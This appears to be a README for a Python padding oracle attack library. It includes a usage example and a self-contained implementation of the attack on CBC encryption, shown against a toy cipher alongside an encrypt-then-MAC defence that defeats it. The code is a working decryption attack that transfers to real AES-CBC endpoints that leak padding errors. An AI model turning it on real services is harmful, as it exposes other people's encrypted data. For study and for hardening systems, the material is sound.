A Python helper class for decrypting CBC-encrypted ciphertexts using the padding oracle attack.
- Implement a function that queries the oracle.
- Import pypoa's OracleAttack class.
- Instantiate the OracleAttack class with the oracle function.
- Call attack.execute(ciphertext) on the ciphertext to leak it.
from Crypto.Cipher import AES            # pycryptodome; assumed here, the original relied on AES.block_size
from Crypto.Util.Padding import unpad    # raises ValueError on invalid PKCS#7 padding
from decrypt import OracleAttack

# Define an oracle function that takes in a ciphertext and queries the oracle whether the padding is valid.
def localOracle(cipherText: bytearray):
    key = b"Sixteen byte key"  # Secret
    iv = cipherText[:AES.block_size]
    ct = cipherText[AES.block_size:]
    try:
        # Query the oracle: CBC-decrypt and strip the padding; only the validity of the padding is observed
        unpad(AES.new(key, AES.MODE_CBC, bytes(iv)).decrypt(bytes(ct)), AES.block_size)
        return True
    except ValueError:
        return False

data = b"secret"  # Secret
key = b"Sixteen byte key"  # Secret
iv = b"/kQ\x0bDZ\xc6F\xb2\xc4\x9c\xca\x8c\'!]"
cipherText = b'VS&\xcb\xa7\xa5<\x14d\x00j\xe6\xb5\xba\xad\x08'
ct = iv + cipherText  # iv || ciphertext, the layout execute() expects

attack = OracleAttack(localOracle)
decrypted = attack.execute(ct)  # recovered plaintext, leaked one byte at a time through localOracle
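The usage above treats execute() as a black box. The following is an added, self-contained walk-through of what a padding oracle attack does and why it stops working once the oracle no longer distinguishes padding errors; it is example code written for this page, not pypoa's implementation, and the names padding_oracle_attack, make_padding_oracle, seal and make_authenticated_oracle are mine. To run offline without pycryptodome it uses a constructed toy Feistel permutation in place of AES; the attack never looks inside the block cipher, it only needs the oracle's True/False answers, so the algorithm is the same one that applies to AES-CBC.

```python
import hashlib
import hmac

BLOCK = 16  # 16-byte (AES-sized) blocks, as in the README example

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _round_fn(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Toy 4-round Feistel permutation, a constructed stand-in for AES; the attack never looks inside it.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round_fn(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round_fn(key, rnd, left)), left
    return left + right

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # the error a padding oracle leaks
    return data[:-n]

def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK
    padded = plaintext + bytes([n]) * n  # PKCS#7 padding
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return iv + out  # iv || ciphertext, the layout the README feeds to execute()

def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    iv, ct = data[:BLOCK], data[BLOCK:]
    if not ct or len(ct) % BLOCK:
        raise ValueError("bad length")
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)

def make_padding_oracle(key: bytes):
    # Vulnerable oracle: reports whether padding was valid, like the README's localOracle.
    def oracle(data: bytes) -> bool:
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False
    return oracle

def padding_oracle_attack(oracle, data: bytes):
    """Recover the plaintext of iv || ciphertext from True/False answers; None if the oracle never leaks."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    recovered = b""
    for prev, cur in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)  # D_k(cur), the block before it is XORed with prev
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos  # padding value forced into positions pos..BLOCK-1
            for guess in range(256):
                forged = bytearray(BLOCK)
                forged[pos] = guess
                for j in range(pos + 1, BLOCK):
                    forged[j] = inter[j] ^ pad  # already-recovered bytes decrypt to `pad`
                if not oracle(bytes(forged) + cur):
                    continue
                if pos == BLOCK - 1:
                    # A hit here could be 0x02 0x02 rather than 0x01: disturb the byte before and re-ask.
                    forged[pos - 1] ^= 0xFF
                    if not oracle(bytes(forged) + cur):
                        continue
                inter[pos] = guess ^ pad
                break
            else:
                return None  # no forgery accepted: the oracle gives no padding information
        recovered += _xor(inter, prev)
    return pkcs7_unpad(recovered)

def seal(key: bytes, mac_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    body = cbc_encrypt(key, iv, plaintext)
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()

def make_authenticated_oracle(key: bytes, mac_key: bytes):
    # Hardened oracle (encrypt-then-MAC): forgeries fail the tag check before padding is ever examined.
    def oracle(data: bytes) -> bool:
        body, tag = data[:-32], data[-32:]
        if not hmac.compare_digest(hmac.new(mac_key, body, hashlib.sha256).digest(), tag):
            return False
        cbc_decrypt(key, body)
        return True
    return oracle
```

Running padding_oracle_attack(make_padding_oracle(key), cbc_encrypt(key, iv, pt)) returns pt after at most 256 queries per byte; the same call against make_authenticated_oracle(key, mac_key) returns None, because every modified block is rejected by the tag check and the oracle's answer carries no information about the padding. That is the defensive point behind the tool: a decryption endpoint that authenticates before it decrypts, or that returns one indistinguishable error for every failure, is not a padding oracle.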
- Support different block sizes.
- Automatic detection of block size.
- Clean up code.
- Port tests to a proper unit test framework.